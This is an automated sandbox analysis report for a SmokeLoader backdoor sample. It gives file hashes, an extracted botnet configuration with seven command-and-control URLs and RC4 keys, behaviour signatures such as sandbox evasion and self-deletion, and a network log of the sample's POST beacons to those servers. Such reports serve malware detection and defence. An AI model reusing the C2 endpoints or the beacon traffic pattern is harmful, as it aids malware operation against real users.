Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Resubmissions

07/01/2024, 18:26 UTC

240107-w3ameabffn 10

Analysis

  • max time kernel
    102s
  • max time network
    158s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    07/01/2024, 18:26 UTC

General

  • Target

    Samples 6/ca181f57edb3d99fbdfd1a512a783d266d479c2fd38ffea14742771df7ba2c1a.exe

  • Size

    248KB

  • MD5

    14c45fa75b1f8644c5fe37ca234a456b

  • SHA1

    056713d15dfa8032597aac2e3f61e6a5794a53e8

  • SHA256

    ca181f57edb3d99fbdfd1a512a783d266d479c2fd38ffea14742771df7ba2c1a

  • SHA512

    b6f212cbb3255c2da4d1935507c5f83833bbeea3b6aca7c0632852db2018dc1a667756b8693a50793cc1ea75296fc13b60eea8c0b645a9e7c901a69a6adbbc21

  • SSDEEP

    3072:A9orP+stnvfG4+zxvGz/QUVcRe/1nkJuTby/cT2cARxVC09++zu:SoCshG4qx1UVco/1aYySAR+

Malware Config

Extracted

Family

smokeloader

Botnet

pub4

Extracted

Family

smokeloader

Version

2022

C2

http://dpav.cc/tmp/

http://lrproduct.ru/tmp/

http://kggcp.com/tmp/

http://talesofpirates.net/tmp/

http://pirateking.online/tmp/

http://piratia.pw/tmp/

http://go-piratia.ru/tmp/

rc4.i32
1
0x3b22e540
rc4.i32
1
0xa6b397e0

Signatures

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Deletes itself 1 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\Samples 6\ca181f57edb3d99fbdfd1a512a783d266d479c2fd38ffea14742771df7ba2c1a.exe
    "C:\Users\Admin\AppData\Local\Temp\Samples 6\ca181f57edb3d99fbdfd1a512a783d266d479c2fd38ffea14742771df7ba2c1a.exe"
    1⤵
    • Checks SCSI registry key(s)
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    PID:4216

Network

  • flag-us
    DNS
    19.177.190.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    19.177.190.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    19.177.190.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    19.177.190.20.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    146.78.124.51.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    146.78.124.51.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    194.178.17.96.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    194.178.17.96.in-addr.arpa
    IN PTR
    Response
    194.178.17.96.in-addr.arpa
    IN PTR
    a96-17-178-194deploystaticakamaitechnologiescom
  • flag-us
    DNS
    194.178.17.96.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    194.178.17.96.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    95.221.229.192.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    95.221.229.192.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    43.58.199.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    43.58.199.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    241.154.82.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    241.154.82.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    103.169.127.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    103.169.127.40.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    75.159.190.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    75.159.190.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    75.159.190.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    75.159.190.20.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    75.159.190.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    75.159.190.20.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    59.128.231.4.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    59.128.231.4.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    dpav.cc
    Remote address:
    8.8.8.8:53
    Request
    dpav.cc
    IN A
    Response
    dpav.cc
    IN A
    211.181.24.133
    dpav.cc
    IN A
    123.140.161.243
    dpav.cc
    IN A
    175.120.254.9
    dpav.cc
    IN A
    211.171.233.129
    dpav.cc
    IN A
    180.94.156.61
    dpav.cc
    IN A
    189.232.1.60
    dpav.cc
    IN A
    190.224.203.37
    dpav.cc
    IN A
    175.126.109.15
    dpav.cc
    IN A
    109.175.29.39
    dpav.cc
    IN A
    186.13.17.220
  • flag-kr
    POST
    http://dpav.cc/tmp/
    Remote address:
    211.181.24.133:80
    Request
    POST /tmp/ HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: http://jwatyipdwmeik.com/
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Length: 226
    Host: dpav.cc
  • flag-us
    DNS
    11.2.37.23.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    11.2.37.23.in-addr.arpa
    IN PTR
    Response
    11.2.37.23.in-addr.arpa
    IN PTR
    a23-37-2-11deploystaticakamaitechnologiescom
  • flag-us
    DNS
    lrproduct.ru
    Remote address:
    8.8.8.8:53
    Request
    lrproduct.ru
    IN A
    Response
  • flag-us
    DNS
    lrproduct.ru
    Remote address:
    8.8.8.8:53
    Request
    lrproduct.ru
    IN A
    Response
  • flag-us
    DNS
    133.24.181.211.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    133.24.181.211.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    kggcp.com
    Remote address:
    8.8.8.8:53
    Request
    kggcp.com
    IN A
    Response
  • flag-us
    DNS
    talesofpirates.net
    Remote address:
    8.8.8.8:53
    Request
    talesofpirates.net
    IN A
    Response
    talesofpirates.net
    IN A
    104.21.1.180
    talesofpirates.net
    IN A
    172.67.129.176
  • flag-us
    POST
    http://talesofpirates.net/tmp/
    Remote address:
    104.21.1.180:80
    Request
    POST /tmp/ HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: http://sohxfuborahxc.com/
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Length: 137
    Host: talesofpirates.net
    Response
    HTTP/1.1 301 Moved Permanently
    Date: Sun, 07 Jan 2024 18:34:11 GMT
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: max-age=3600
    Expires: Sun, 07 Jan 2024 19:34:11 GMT
    Location: https://talesofpirates.net/tmp/
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=3qikrhStPhb4jdXXmJUSTg9On7He3waaK0Ww6FCsHh%2F%2BU8SDS6WkB0YoYjhrj36Ck7blCYjUBD%2F9cMQkXCMtqd9VptGG3SWVZbAXEH8NeERKglnmqE8WjeS1M08rjoCr4S9UDVg%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 841e4b2089b3731b-LHR
    alt-svc: h3=":443"; ma=86400
  • flag-us
    GET
    https://talesofpirates.net/tmp/
    Remote address:
    104.21.1.180:443
    Request
    GET /tmp/ HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    Referer: http://sohxfuborahxc.com/
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Host: talesofpirates.net
    Response
    HTTP/1.1 200 OK
    Date: Sun, 07 Jan 2024 18:34:19 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    Set-Cookie: PHPSESSID=ug4q4d6cc8ttmdcaotatusrl8j; path=/
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=VJ2MppETchxq1cYixgnRITA4xBM6vIPw6GqSLh%2BzIlGSeJWXtCcJKhPGk801BlZ5a7pDuoyg%2B7ON9XeM01N1CinIzY7Fq8rIs9rmbDAA%2FZksXs0YmI9oH4YrFWVveAU1NDL1bKw%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 841e4b4dc83d63e7-LHR
    alt-svc: h3=":443"; ma=86400
  • flag-us
    DNS
    180.1.21.104.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    180.1.21.104.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    180.1.21.104.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    180.1.21.104.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    56.126.166.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    56.126.166.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    232.135.221.88.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    232.135.221.88.in-addr.arpa
    IN PTR
    Response
    232.135.221.88.in-addr.arpa
    IN PTR
    a88-221-135-232deploystaticakamaitechnologiescom
  • flag-us
    DNS
    150.1.37.23.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    150.1.37.23.in-addr.arpa
    IN PTR
    Response
    150.1.37.23.in-addr.arpa
    IN PTR
    a23-37-1-150deploystaticakamaitechnologiescom
  • flag-us
    DNS
    pirateking.online
    Remote address:
    8.8.8.8:53
    Request
    pirateking.online
    IN A
    Response
    pirateking.online
    IN A
    172.67.180.11
    pirateking.online
    IN A
    104.21.96.118
  • flag-us
    DNS
    pirateking.online
    Remote address:
    8.8.8.8:53
    Request
    pirateking.online
    IN A
  • flag-us
    POST
    http://pirateking.online/tmp/
    Remote address:
    172.67.180.11:80
    Request
    POST /tmp/ HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: http://pvasducwsnbk.com/
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Length: 141
    Host: pirateking.online
    Response
    HTTP/1.1 301 Moved Permanently
    Date: Sun, 07 Jan 2024 18:34:20 GMT
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: max-age=3600
    Expires: Sun, 07 Jan 2024 19:34:20 GMT
    Location: https://pirateking.online/tmp/
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=IXBIHSRHfXFDdBUnrCwYpKkSUBdWL410VWodhKWUHTy95z24nx3azzZNZJq6Ur%2FZs64pR%2BCyFvtCQowLbcKc4xyThau8WvhbtnuiD1OXjMUUpFBWWvbJFdoflm9xD0CCzgt6zQ%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 841e4b567cdb79ba-LHR
    alt-svc: h3=":443"; ma=86400
  • flag-us
    GET
    https://pirateking.online/tmp/
    Remote address:
    172.67.180.11:443
    Request
    GET /tmp/ HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    Referer: http://pvasducwsnbk.com/
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Host: pirateking.online
    Response
    HTTP/1.1 520
    Date: Sun, 07 Jan 2024 18:34:21 GMT
    Content-Type: text/plain; charset=UTF-8
    Content-Length: 15
    Connection: keep-alive
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=nIIFjTlFsAb3f5M6KQ9Ef48iIvWnQDEn%2FCzNeYwALRXb3v1y2E65qR3qywdfUkbjMAupOZjWs4vWxFWS9hJhWss1oCMWAZIPftluQ6OrFLiegekD7vMDdj4IFaQtiRum1dvUTw%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Strict-Transport-Security: max-age=2592000; includeSubDomains
    X-Frame-Options: SAMEORIGIN
    Referrer-Policy: same-origin
    Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Expires: Thu, 01 Jan 1970 00:00:01 GMT
    Server: cloudflare
    CF-RAY: 841e4b57cb0c7755-LHR
    alt-svc: h3=":443"; ma=86400
  • flag-us
    DNS
    piratia.pw
    Remote address:
    8.8.8.8:53
    Request
    piratia.pw
    IN A
    Response
    piratia.pw
    IN A
    104.21.79.117
    piratia.pw
    IN A
    172.67.170.133
  • flag-us
    POST
    http://piratia.pw/tmp/
    Remote address:
    104.21.79.117:80
    Request
    POST /tmp/ HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: http://hdyfoqbyrdss.com/
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Length: 237
    Host: piratia.pw
  • flag-us
    DNS
    11.180.67.172.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    11.180.67.172.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    117.79.21.104.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    117.79.21.104.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    117.79.21.104.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    117.79.21.104.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    go-piratia.ru
    Remote address:
    8.8.8.8:53
    Request
    go-piratia.ru
    IN A
    Response
    go-piratia.ru
    IN A
    104.21.51.101
    go-piratia.ru
    IN A
    172.67.179.5
  • flag-us
    POST
    http://go-piratia.ru/tmp/
    Remote address:
    104.21.51.101:80
    Request
    POST /tmp/ HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: http://lswmwcurwnk.com/
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Length: 238
    Host: go-piratia.ru
    Response
    HTTP/1.1 301 Moved Permanently
    Date: Sun, 07 Jan 2024 18:34:25 GMT
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: max-age=3600
    Expires: Sun, 07 Jan 2024 19:34:25 GMT
    Location: https://go-piratia.ru/tmp/
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=OJ7BOmdERqDD26AEu6cTNek58pb9WDsY7gjYj7OjATKdeJ2yBemlP3O%2FfnpJwVEkq34YUKaQTyLTqVgWjNNxtjPNJjrY1ggdKiznI8OOkK9sQ4KlguET3VgXqDvcGHLT"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 841e4b74b9b63859-LHR
    alt-svc: h3=":443"; ma=86400
  • flag-us
    GET
    https://go-piratia.ru/tmp/
    Remote address:
    104.21.51.101:443
    Request
    GET /tmp/ HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    Referer: http://lswmwcurwnk.com/
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Host: go-piratia.ru
    Response
    HTTP/1.1 404 Not Found
    Date: Sun, 07 Jan 2024 18:34:27 GMT
    Content-Type: text/html;charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/8.0.30
    X-IPS-LoggedIn: 0
    Vary: Cookie,Accept-Encoding
    X-XSS-Protection: 0
    X-Frame-Options: sameorigin
    Content-Security-Policy: frame-ancestors 'self'
    X-Content-Security-Policy: frame-ancestors 'self'
    Referrer-Policy: strict-origin-when-cross-origin
    Expires: Sun, 07 Jan 2024 18:49:27 GMT
    Cache-Control: no-cache="Set-Cookie", max-age=900, public, s-maxage=900, stale-while-revalidate, stale-if-error
    Set-Cookie: ips4_IPSSessionFront=7eb3b1231b1937499caf55a2a4be7091; path=/; secure; HttpOnly
    Set-Cookie: ips4_chatbox_inRoom=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; secure; HttpOnly
    Last-Modified: Sun, 07 Jan 2024 18:34:27 GMT
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=nF2Uclhh08%2FyjydiRTWZmwltm68ePLqI11V7Bi%2Ff0Jo%2BBqrz0xCW8slXrls%2Bmy2FXeRxbVC%2FnrXVXG81ste1bt2JQMWLz%2BMbYm%2B2INDKYDmvOJxXq1Fq1T1W3C%2F3jglC"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 841e4b7e48086358-LHR
    alt-svc: h3=":443"; ma=86400
  • flag-us
    DNS
    101.51.21.104.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    101.51.21.104.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    186.178.17.96.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    186.178.17.96.in-addr.arpa
    IN PTR
    Response
    186.178.17.96.in-addr.arpa
    IN PTR
    a96-17-178-186deploystaticakamaitechnologiescom
  • flag-us
    DNS
    205.47.74.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    205.47.74.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    100.5.17.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    100.5.17.2.in-addr.arpa
    IN PTR
    Response
    100.5.17.2.in-addr.arpa
    IN PTR
    a2-17-5-100deploystaticakamaitechnologiescom
  • flag-us
    DNS
    100.5.17.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    100.5.17.2.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    119.110.54.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    119.110.54.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    30.243.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    30.243.111.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    18.134.221.88.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    18.134.221.88.in-addr.arpa
    IN PTR
    Response
    18.134.221.88.in-addr.arpa
    IN PTR
    a88-221-134-18deploystaticakamaitechnologiescom
  • flag-us
    DNS
    187.178.17.96.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    187.178.17.96.in-addr.arpa
    IN PTR
    Response
    187.178.17.96.in-addr.arpa
    IN PTR
    a96-17-178-187deploystaticakamaitechnologiescom
  • flag-us
    DNS
    80.135.221.88.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    80.135.221.88.in-addr.arpa
    IN PTR
    Response
    80.135.221.88.in-addr.arpa
    IN PTR
    a88-221-135-80deploystaticakamaitechnologiescom
  • flag-us
    DNS
    80.135.221.88.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    80.135.221.88.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    0.204.248.87.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    0.204.248.87.in-addr.arpa
    IN PTR
    Response
    0.204.248.87.in-addr.arpa
    IN PTR
    https-87-248-204-0lhrllnwnet
  • flag-us
    DNS
    0.204.248.87.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    0.204.248.87.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    Remote address:
    8.8.8.8:53
    Response
    tse1.mm.bing.net
    IN CNAME
    mm-mm.bing.net.trafficmanager.net
    mm-mm.bing.net.trafficmanager.net
    IN CNAME
    dual-a-0001.a-msedge.net
    dual-a-0001.a-msedge.net
    IN A
    204.79.197.200
    dual-a-0001.a-msedge.net
    IN A
    13.107.21.200
  • flag-us
    DNS
    79.121.231.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    79.121.231.20.in-addr.arpa
    IN PTR
    Response
  • 138.91.171.81:80
    52 B
    1
  • 211.181.24.133:80
    http://dpav.cc/tmp/
    http
    765 B
    172 B
    6
    4

    HTTP Request

    POST http://dpav.cc/tmp/
  • 104.21.1.180:80
    http://talesofpirates.net/tmp/
    http
    733 B
    861 B
    7
    5

    HTTP Request

    POST http://talesofpirates.net/tmp/

    HTTP Response

    301
  • 104.21.1.180:443
    https://talesofpirates.net/tmp/
    tls, http
    1.7kB
    11.6kB
    17
    17

    HTTP Request

    GET https://talesofpirates.net/tmp/

    HTTP Response

    200
  • 172.67.180.11:80
    http://pirateking.online/tmp/
    http
    735 B
    860 B
    7
    5

    HTTP Request

    POST http://pirateking.online/tmp/

    HTTP Response

    301
  • 172.67.180.11:443
    https://pirateking.online/tmp/
    tls, http
    961 B
    6.2kB
    10
    9

    HTTP Request

    GET https://pirateking.online/tmp/

    HTTP Response

    520
  • 104.21.79.117:80
    http://piratia.pw/tmp/
    http
    1.3kB
    144 B
    7
    3

    HTTP Request

    POST http://piratia.pw/tmp/
  • 104.21.51.101:80
    http://go-piratia.ru/tmp/
    http
    931 B
    2.2kB
    9
    7

    HTTP Request

    POST http://go-piratia.ru/tmp/

    HTTP Response

    301
  • 104.21.51.101:443
    https://go-piratia.ru/tmp/
    tls, http
    1.7kB
    38.1kB
    25
    35

    HTTP Request

    GET https://go-piratia.ru/tmp/

    HTTP Response

    404
  • 204.79.197.200:443
    tse1.mm.bing.net
    tls
    29.1kB
    856.6kB
    615
    619
  • 204.79.197.200:443
    tse1.mm.bing.net
    tls
    615 B
    7.6kB
    9
    8
  • 204.79.197.200:443
    tse1.mm.bing.net
    tls
    615 B
    7.6kB
    9
    8
  • 204.79.197.200:443
    tse1.mm.bing.net
    tls
    615 B
    7.6kB
    9
    8
  • 204.79.197.200:443
    tse1.mm.bing.net
    tls
    615 B
    7.6kB
    9
    8
  • 8.8.8.8:53
    19.177.190.20.in-addr.arpa
    dns
    144 B
    158 B
    2
    1

    DNS Request

    19.177.190.20.in-addr.arpa

    DNS Request

    19.177.190.20.in-addr.arpa

  • 8.8.8.8:53
    146.78.124.51.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    146.78.124.51.in-addr.arpa

  • 8.8.8.8:53
    194.178.17.96.in-addr.arpa
    dns
    144 B
    137 B
    2
    1

    DNS Request

    194.178.17.96.in-addr.arpa

    DNS Request

    194.178.17.96.in-addr.arpa

  • 8.8.8.8:53
    95.221.229.192.in-addr.arpa
    dns
    73 B
    144 B
    1
    1

    DNS Request

    95.221.229.192.in-addr.arpa

  • 8.8.8.8:53
    43.58.199.20.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    43.58.199.20.in-addr.arpa

  • 8.8.8.8:53
    241.154.82.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    241.154.82.20.in-addr.arpa

  • 8.8.8.8:53
    103.169.127.40.in-addr.arpa
    dns
    73 B
    147 B
    1
    1

    DNS Request

    103.169.127.40.in-addr.arpa

  • 8.8.8.8:53
    75.159.190.20.in-addr.arpa
    dns
    216 B
    158 B
    3
    1

    DNS Request

    75.159.190.20.in-addr.arpa

    DNS Request

    75.159.190.20.in-addr.arpa

    DNS Request

    75.159.190.20.in-addr.arpa

  • 8.8.8.8:53
    59.128.231.4.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    59.128.231.4.in-addr.arpa

  • 8.8.8.8:53
    dpav.cc
    dns
    53 B
    213 B
    1
    1

    DNS Request

    dpav.cc

    DNS Response

    211.181.24.133
    123.140.161.243
    175.120.254.9
    211.171.233.129
    180.94.156.61
    189.232.1.60
    190.224.203.37
    175.126.109.15
    109.175.29.39
    186.13.17.220

  • 8.8.8.8:53
    11.2.37.23.in-addr.arpa
    dns
    69 B
    131 B
    1
    1

    DNS Request

    11.2.37.23.in-addr.arpa

  • 8.8.8.8:53
    lrproduct.ru
    dns
    116 B
    116 B
    2
    2

    DNS Request

    lrproduct.ru

    DNS Request

    lrproduct.ru

  • 8.8.8.8:53
    133.24.181.211.in-addr.arpa
    dns
    73 B
    142 B
    1
    1

    DNS Request

    133.24.181.211.in-addr.arpa

  • 8.8.8.8:53
    kggcp.com
    dns
    55 B
    55 B
    1
    1

    DNS Request

    kggcp.com

  • 8.8.8.8:53
    talesofpirates.net
    dns
    64 B
    96 B
    1
    1

    DNS Request

    talesofpirates.net

    DNS Response

    104.21.1.180
    172.67.129.176

  • 8.8.8.8:53
    180.1.21.104.in-addr.arpa
    dns
    142 B
    133 B
    2
    1

    DNS Request

    180.1.21.104.in-addr.arpa

    DNS Request

    180.1.21.104.in-addr.arpa

  • 8.8.8.8:53
    56.126.166.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    56.126.166.20.in-addr.arpa

  • 8.8.8.8:53
    232.135.221.88.in-addr.arpa
    dns
    73 B
    139 B
    1
    1

    DNS Request

    232.135.221.88.in-addr.arpa

  • 8.8.8.8:53
    150.1.37.23.in-addr.arpa
    dns
    70 B
    133 B
    1
    1

    DNS Request

    150.1.37.23.in-addr.arpa

  • 8.8.8.8:53
    pirateking.online
    dns
    126 B
    95 B
    2
    1

    DNS Request

    pirateking.online

    DNS Request

    pirateking.online

    DNS Response

    172.67.180.11
    104.21.96.118

  • 8.8.8.8:53
    piratia.pw
    dns
    56 B
    88 B
    1
    1

    DNS Request

    piratia.pw

    DNS Response

    104.21.79.117
    172.67.170.133

  • 8.8.8.8:53
    11.180.67.172.in-addr.arpa
    dns
    72 B
    134 B
    1
    1

    DNS Request

    11.180.67.172.in-addr.arpa

  • 8.8.8.8:53
    117.79.21.104.in-addr.arpa
    dns
    144 B
    134 B
    2
    1

    DNS Request

    117.79.21.104.in-addr.arpa

    DNS Request

    117.79.21.104.in-addr.arpa

  • 8.8.8.8:53
    go-piratia.ru
    dns
    59 B
    91 B
    1
    1

    DNS Request

    go-piratia.ru

    DNS Response

    104.21.51.101
    172.67.179.5

  • 8.8.8.8:53
    101.51.21.104.in-addr.arpa
    dns
    72 B
    134 B
    1
    1

    DNS Request

    101.51.21.104.in-addr.arpa

  • 8.8.8.8:53
    186.178.17.96.in-addr.arpa
    dns
    72 B
    137 B
    1
    1

    DNS Request

    186.178.17.96.in-addr.arpa

  • 8.8.8.8:53
    205.47.74.20.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    205.47.74.20.in-addr.arpa

  • 8.8.8.8:53
    100.5.17.2.in-addr.arpa
    dns
    138 B
    131 B
    2
    1

    DNS Request

    100.5.17.2.in-addr.arpa

    DNS Request

    100.5.17.2.in-addr.arpa

  • 8.8.8.8:53
    119.110.54.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    119.110.54.20.in-addr.arpa

  • 8.8.8.8:53
    30.243.111.52.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    30.243.111.52.in-addr.arpa

  • 8.8.8.8:53
    18.134.221.88.in-addr.arpa
    dns
    72 B
    137 B
    1
    1

    DNS Request

    18.134.221.88.in-addr.arpa

  • 8.8.8.8:53
    187.178.17.96.in-addr.arpa
    dns
    72 B
    137 B
    1
    1

    DNS Request

    187.178.17.96.in-addr.arpa

  • 8.8.8.8:53
    80.135.221.88.in-addr.arpa
    dns
    144 B
    137 B
    2
    1

    DNS Request

    80.135.221.88.in-addr.arpa

    DNS Request

    80.135.221.88.in-addr.arpa

  • 8.8.8.8:53
    0.204.248.87.in-addr.arpa
    dns
    142 B
    116 B
    2
    1

    DNS Request

    0.204.248.87.in-addr.arpa

    DNS Request

    0.204.248.87.in-addr.arpa

  • 8.8.8.8:53
    dns
    173 B
    1

    DNS Response

    204.79.197.200
    13.107.21.200

  • 8.8.8.8:53
    79.121.231.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    79.121.231.20.in-addr.arpa

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/3520-4-0x0000000002950000-0x0000000002966000-memory.dmp

    Filesize

    88KB

  • memory/4216-3-0x0000000000400000-0x00000000007C7000-memory.dmp

    Filesize

    3.8MB

  • memory/4216-2-0x0000000002510000-0x000000000251B000-memory.dmp

    Filesize

    44KB

  • memory/4216-1-0x0000000000970000-0x0000000000A70000-memory.dmp

    Filesize

    1024KB

  • memory/4216-5-0x0000000000400000-0x00000000007C7000-memory.dmp

    Filesize

    3.8MB

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.